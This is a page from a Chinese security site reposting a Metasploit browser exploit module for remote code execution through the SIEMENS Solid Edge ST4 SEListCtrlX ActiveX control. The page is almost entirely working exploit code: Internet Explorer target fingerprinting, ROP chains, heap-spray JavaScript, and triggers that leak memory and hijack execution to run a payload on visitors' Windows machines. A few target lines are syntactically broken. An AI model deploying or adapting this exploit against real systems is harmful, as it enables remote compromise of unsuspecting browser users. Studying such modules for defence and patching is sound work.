首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution
来源:metasploit.com 作者:rgod 发布时间:2013-10-08  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn
  
  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "9.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :rank       => Rank,
    :classid    => "{5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}"
  })
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",
      'Description'    => %q{
        This module exploits the SEListCtrlX ActiveX installed with the SIEMENS Solid Edge product.
        The vulnerability exists on several APIs provided by the control, where user supplied input
        is handled as a memory pointer without proper validation, allowing an attacker to read and
        corrupt memory from the target process. This module abuses the methods NumChildren() and
        DeleteItem() in order to achieve memory info leak and remote code execution respectively.
        This module has been tested successfully on IE6-IE9 on Windows XP SP3 and Windows 7 SP1,
        using Solid Edge 10.4.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '93696' ],
          [ 'EDB', '25712' ],
          [ 'URL', 'http://retrogod.altervista.org/9sg_siemens_adv_ii.htm' ]
        ],
      'Payload'        =>
        {
          'Space' => 906,
          'DisableNops' => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Jutil.dll 104.0.0.82
          # SEListCtrlX 104.0.0.82
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil'Offset' => '0x5F4' } ],
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil'Offset' => '0x5F4' } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4' } ],
          [ 'IE 7 on Windows Vista',  { 'Rop' => nil'Offset' => '0x5f4' } ],
          [ 'IE 8 on Windows Vista',  { 'Rop' => :jutil, 'Offset' => '0x5f4' } ],
          [ 'IE 8 on Windows 7',      { 'Rop' => :jutil, 'Offset' => '0x5f4' } ],
          [ 'IE 9 on Windows 7',      { 'Rop' => :jutil, 'Offset' => '0x5fe' } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 26 2013",
      'DefaultTarget'  => 0))
  
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  
  end
  
  def junk
    return rand_text_alpha(4).unpack("V").first
  end
  
  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'
  
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
  
    ie_name = "IE #{ie}"
  
    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end
  
    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end
  
    return nil
  end
  
  # JUtil ROP Chain
  # Jutil Base: 0x1d550000
  # Stack Pivot: jutil_base + 0x000a5843 # xchg eax, esp # ret
  # Adjust Stack: jutil_base + 0x00212f17 # pop # pop # ret
  # 0x1db2e121, # POP EDX # RETN [JUtil.dll]
  # 0x1d5520ca, # ptr to &VirtualProtect() [IAT JUtil.dll]
  # 0x1da0ebeb, # MOV EDX,DWORD PTR DS:[EDX] # RETN [JUtil.dll]
  # 0x1da103d2, # MOV ESI,EDX # RETN [JUtil.dll]
  # 0x1d70e314, # POP EBP # RETN [JUtil.dll]
  # 0x1d5fc8e8, # & jmp esp [JUtil.dll]
  # 0x1d631859, # POP EBX # RETN [JUtil.dll]
  # 0x00000201, # 0x00000201-> ebx
  # 0x1d769cf9, # POP EDX # RETN [JUtil.dll]
  # 0x00000040, # 0x00000040-> edx
  # 0x1d6d2e50, # POP ECX # RETN [JUtil.dll]
  # 0x1da45217, # &Writable location [JUtil.dll]
  # 0x1d632fd1, # POP EDI # RETN [JUtil.dll]
  # 0x1d6839db, # RETN (ROP NOP) [JUtil.dll]
  # 0x1d752439, # POP EAX # RETN [JUtil.dll]
  # 0x90909090, # nop
  # 0x1da4cfe3, # PUSHAD # RETN [JUtil.dll]
  def ie9_spray(t, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
    js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(t.arch))
  
    js = %Q|
  
    function rop_chain(jutil_base){
      var arr = [
        Number(Math.floor(Math.random()*0xffffffff)),
        Number(0x0c0c0c0c),
        Number(0x0c0c0c0c),
        Number(0x0c0c0c1c),
        Number(0x0c0c0c24),
        Number(0x0c0c0c28),
        Number(Math.floor(Math.random()*0xffffffff)),
        Number(Math.floor(Math.random()*0xffffffff)),
        Number(0x0c0c0c0c),
        Number(0x0c0c0c3c),
        jutil_base + Number(0x00212f17),
        jutil_base + Number(0x000a5843),
        Number(0x0c0c0c34),
        jutil_base + Number(0x5de121),
        jutil_base + Number(0x20ca),
        jutil_base + Number(0x4bebeb),
        jutil_base + Number(0x4c03d2),
        jutil_base + Number(0x1be314),
        jutil_base + Number(0xac8e8),
        jutil_base + Number(0xe1859),
        Number(0x00000201),
        jutil_base + Number(0x219cf9),
        Number(0x00000040),
        jutil_base + Number(0x182e50),
        jutil_base + Number(0x4f5217),
        jutil_base + Number(0xe2fd1),
        jutil_base + Number(0x1339db),
        jutil_base + Number(0x202439),
        Number(0x90909090),
        jutil_base + Number(0x4fcfe3)
      ];
      return arr;
    }
  
    function d2u(dword){
      var uni = String.fromCharCode(dword & 0xFFFF);
      uni += String.fromCharCode(dword>>16);
      return uni;
    }
  
    function tab2uni(tab){
      var uni = ""
      for(var i=0;i<tab.length;i++){
        uni += d2u(tab[i]);
      }
      return uni;
    }
  
    function randomblock(blocksize)
    {
      var theblock = "";
      for (var i = 0; i < blocksize; i++)
      {
        theblock += Math.floor(Math.random()*90)+10;
      }
      return theblock;
    }
  
    function tounescape(block)
    {
      var blocklen = block.length;
      var unescapestr = "";
      for (var i = 0; i < blocklen-1; i=i+4)
      {
        unescapestr += "%u" + block.substring(i,i+4);
      }
      return unescapestr;
    }
  
    var heap_obj = new heapLib.ie(0x10000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_random_nops}");
  
    function heap_spray(jutil_base) {
      while (nops.length < 0x80000) nops += nops;
      var offset_length = #{t['Offset']};
      for (var i=0; i < 0x1000; i++) {
        var padding = unescape(tounescape(randomblock(0x1000)));
        while (padding.length < 0x1000) padding+= padding;
        var junk_offset = padding.substring(0, offset_length);
        var rop = tab2uni(rop_chain(jutil_base));
        var single_sprayblock = junk_offset + rop + code + nops.substring(0, 0x800 - rop.length -  code.length - junk_offset.length);
        while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
        sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
        heap_obj.alloc(sprayblock);
      }
    }
    |
    return js
  end
  
  def ie8_spray(t, p)
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
  
    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
  
    function rop_chain(jutil_base){
      var arr = [
        Number(Math.floor(Math.random()*0xffffffff)),
        Number(0x0c0c0c0c),
        Number(0x0c0c0c0c),
        Number(0x0c0c0c1c),
        Number(0x0c0c0c24),
        Number(0x0c0c0c28),
        Number(Math.floor(Math.random()*0xffffffff)),
        Number(Math.floor(Math.random()*0xffffffff)),
        Number(0x0c0c0c0c),
        Number(0x0c0c0c3c),
        jutil_base + Number(0x00212f17),
        jutil_base + Number(0x000a5843),
        Number(0x0c0c0c34),
        jutil_base + Number(0x5de121),
        jutil_base + Number(0x20ca),
        jutil_base + Number(0x4bebeb),
        jutil_base + Number(0x4c03d2),
        jutil_base + Number(0x1be314),
        jutil_base + Number(0xac8e8),
        jutil_base + Number(0xe1859),
        Number(0x00000201),
        jutil_base + Number(0x219cf9),
        Number(0x00000040),
        jutil_base + Number(0x182e50),
        jutil_base + Number(0x4f5217),
        jutil_base + Number(0xe2fd1),
        jutil_base + Number(0x1339db),
        jutil_base + Number(0x202439),
        Number(0x90909090),
        jutil_base + Number(0x4fcfe3)
      ];
      return arr;
    }
  
    function d2u(dword){
      var uni = String.fromCharCode(dword & 0xFFFF);
      uni += String.fromCharCode(dword>>16);
      return uni;
    }
  
    function tab2uni(tab){
      var uni = ""
      for(var i=0;i<tab.length;i++){
        uni += d2u(tab[i]);
      }
      return uni;
    }
  
    function heap_spray(jutil_base) {
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{t['Offset']});
      var rop = tab2uni(rop_chain(jutil_base));
      var shellcode = offset + rop + code + nops.substring(0, 0x800-rop.length-code.length-offset.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);
      heap_obj.gc();
      for (var i=1; i < 0x300; i++) {
        heap_obj.alloc(block);
      }
    }
    |
    return js
  end
  
  def ie6_spray(t, p)
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
  
    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var nops = unescape("#{js_nops}");
    var code = unescape("#{js_code}");
  
    function heap_spray() {
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{t['Offset']});
      var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);
      heap_obj.gc();
      for (var i=1; i < 0x300; i++) {
        heap_obj.alloc(block);
      }
    }
    |
    return js
  end
  
  def ie_heap_spray(my_target, p)
    # Land the payload at 0x0c0c0c0c
    case my_target
    when targets[7]
      # IE 9 on Windows 7
      js = ie9_spray(my_target, p)
    when targets[5], targets[6]
      # IE 8 on Windows 7 and Windows Vista
      js = ie8_spray(my_target, p)
    else
      js = ie6_spray(my_target, p)
    end
  
    js = heaplib(js, {:noobfu => true})
  
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
      @heap_spray_fn = js.sym("heap_spray")
    else
      @heap_spray_fn = "heap_spray"
    end
  
    return js
  end
  
  def get_windows_xp_payload
    fake_memory = [
        junk,       # junk         # 0c0c0c0c
        0x0c0c0c0c, # Dereference  # 0c0c0c10
        0x0c0c0c0c, # Dereference  # 0c0c0c14
        0x0c0c0c1c, # [0x0c0c0c0c] # 0c0c0c18
        0x0c0c0c24, # Dereference  # 0c0c0c1c
        0x0c0c0c28, # Dereference  # 0c0c0c20
        junk,       # junk         # 0c0c0c24
        junk,       # junk         # 0c0c0c28
        0x0c0c0c0c, # Dereference  # 0c0c0c2c
        0x0c0c0c30, # Dereference  # 0c0c0c30
        0x0c0c0c38, # new eip      # 0c0c0c34
    ].pack("V*")
  
    p = fake_memory + payload.encoded
  
    return p
  end
  
  def get_windows_msvcrt_payload
    fake_memory = [
        junk,       # junk         # 0c0c0c0c
        0x0c0c0c0c, # Dereference  # 0c0c0c10
        0x0c0c0c0c, # Dereference  # 0c0c0c14
        0x0c0c0c1c, # [0x0c0c0c0c] # 0c0c0c18
        0x0c0c0c24, # Dereference  # 0c0c0c1c
        0x0c0c0c28, # Dereference  # 0c0c0c20
        junk,       # junk         # 0c0c0c24
        junk,       # junk         # 0c0c0c28
        0x0c0c0c0c, # Dereference  # 0c0c0c2c
        0x0c0c0c3c, # Dereference  # 0c0c0c30
        0x77c21ef4, # ppr msvcrt   # 0c0c0c34
        0x77c15ed5, # xchg eax,esp # ret (msvcrt)
        0x0c0c0c34  # eax value    # 0c0c0c3c
    ].pack("V*")
  
    return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
  end
  
  def get_payload(t)
  
    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      p = get_windows_msvcrt_payload
    when :jutil
      print_status("Using JUtil ROP built dynamically...")
      p = payload.encoded
    else
      print_status("Using payload without ROP...")
      p = get_windows_xp_payload
    end
  
    return p
  end
  
  def info_leak_trigger
    js = <<-EOS
    <object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
    </object>
    <script language='javascript'>
    jutil_address = obj.NumChildren(0x10017018 - 0x0c);
    jutil_base = jutil_address - 0x49440;
    #{@heap_spray_fn}(jutil_base);
    obj.DeleteItem(0x0c0c0c08);
    </script>
    EOS
  
    return js
  end
  
  def exec_trigger
    js = <<-EOS
    <object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
    </object>
    <script language='javascript'>
    #{@heap_spray_fn}();
    obj.DeleteItem(0x0c0c0c08);
    </script>
    EOS
  
    return js
  end
  
  def get_trigger(t)
    case t['Rop']
      when :jutil
        js = info_leak_trigger
      else
        js = exec_trigger
    end
  
    return js
  end
  
  def load_exploit_html(my_target)
    p  = get_payload(my_target)
    js = ie_heap_spray(my_target, p)
    trigger = get_trigger(my_target)
  
    html = %Q|
    <html>
    <head>
    <script language='javascript'>
    #{js}
    </script>
    </head>
    <body>
    #{trigger}
    </body>
    </html>
    |
  
    return html
  end
  
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")
  
    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end
  
    html = load_exploit_html(my_target)
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache Tomcat/JBoss EJBInvoker
·FreeBSD Intel SYSRET Kernel Pr
·HylaFAX+ 5.2.4 - 5.5.3 - Buffe
·Evince PDF Reader 2.32.0.145 /
·Internet Explorer 7.0 "documen
·Ice Cold Apps Servers Ultimate
·Internet Explorer "wshom.ocx"
·Apple Motion 5.0.7 Integer Ove
·Astium Remote Code Execution V
·FlashChat Arbitrary File Uploa
·mod_accounting 0.5 Blind SQL I
·ClipBucket Remote Code Executi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved